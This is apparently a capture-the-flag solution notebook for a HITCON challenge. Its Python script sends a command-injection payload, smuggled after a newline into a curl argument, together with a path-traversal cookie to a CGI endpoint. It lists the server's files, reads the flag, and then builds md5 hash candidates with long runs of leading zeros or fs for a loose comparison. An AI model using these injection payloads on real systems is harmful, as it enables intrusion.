import requests
headers = dict()
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {"diagsess":"../etc/passwd"} # doesn't matter
cmd =" ls /"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]
bin boot dev etc home initrd.img key.txt lib lib64 lost+found media mnt opt proc read_key root run sbin srv sys tmp usr var vmlinuz
cmd = "/read_key /key.txt"
# or use python to read stderr
# cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]
HITCON{a755be06b165ed8fc4710d3544fce942}
# BTW, attempts to find an admin password
# from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
class ListTable(list):
""" Overridden list class which takes a 2-dimensional list of
the form [[1,2,3],[4,5,6]], and renders an HTML Table in
IPython Notebook. """
def _repr_html_(self):
html = ["<table>"]
for row in self:
html.append("<tr>")
html.extend("<td>{0}</td>".format(col) for col in row)
html.append("</tr>")
html.append("</table>")
return ''.join(html)
from hashlib import md5
L =[ "djGFYmi", "ZkjAFaaaa",
"G/I2/vILur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
"Vf3ppC4Iu74AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
"6Za/F6+mur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA= ".decode("base64"),
'Kdr.b4v', 'K1UgX15KGWDJKTdo', 'xIoN=JG', 'http://weijr-eng.blogspot.com GE\x00\x00\x0f\xe5\xef\x0b']
L+=[ 'b81.org/kpoz&AV' , 'b81.org/GD9FD&Sa', 'b81.org/S27Mp1Ya', 'http://weijr-eng.blogspot.com \xbf\x13\x00\x00\xbd\xae\xcb`']
L+=['http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4', 'http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c']
S = sorted( (md5(x).hexdigest(), x) for x in L )
ListTable([['Leading 0 or f', 'md5 hexdigest', 'plaintext']]+[[[i for i in range(len(s[0])-1) if s[0][i]!=s[0][i+1]][0]+1, s[0], repr(s[1])] for s in S])
Leading 0 or f | md5 hexdigest | plaintext |
13 | 000000000000079ad03b44781b4e6c59 | 'http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4' |
12 | 0000000000006c32a237fc882cc44a4b | 'U\xfd\xe9\xa4.\x08\xbb\xbe\x00\x00\x00\x00http://hashcat.net/\x00' |
12 | 0000000000008d003b0ffcf6b666342e | 'xIoN=JG' |
11 | 00000000000277ec3301b3cabacb95c9 | '\x1b\xf26\xfe\xf2\x0b\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00' |
11 | 00000000000639f3eb26b63f0a7baca3 | 'ZkjAFaaaa' |
11 | 00000000000b814f9865b26c0ebb4136 | 'Kdr.b4v' |
11 | 00000000000ccda838e4b06d6d662dca | 'djGFYmi' |
10 | 000000000016deedb58402856305e702 | 'b81.org/GD9FD&Sa' |
10 | ffffffffffe538aaef4811a59ec8af0f | 'b81.org/S27Mp1Ya' |
10 | ffffffffffe9b60be6c8e43b80c29582 | 'http://weijr-eng.blogspot.com \xbf\x13\x00\x00\xbd\xae\xcb`' |
11 | fffffffffff5d05f4b93da2870f43376 | 'K1UgX15KGWDJKTdo' |
11 | fffffffffff8821c53918df398cda5d8 | 'b81.org/kpoz&AV' |
11 | fffffffffffd880637cda3008c943ce6 | 'http://weijr-eng.blogspot.com GE\x00\x00\x0f\xe5\xef\x0b' |
12 | ffffffffffff4de6f952846ffc0f4d15 | '\xe9\x96\xbf\x17\xaf\xa6\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00' |
13 | fffffffffffff194e10443811b0ca0cd | 'http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c' |
with open('md5low','w') as f:
f.write('http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4')
with open('md5high', 'w') as f:
f.write('http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c')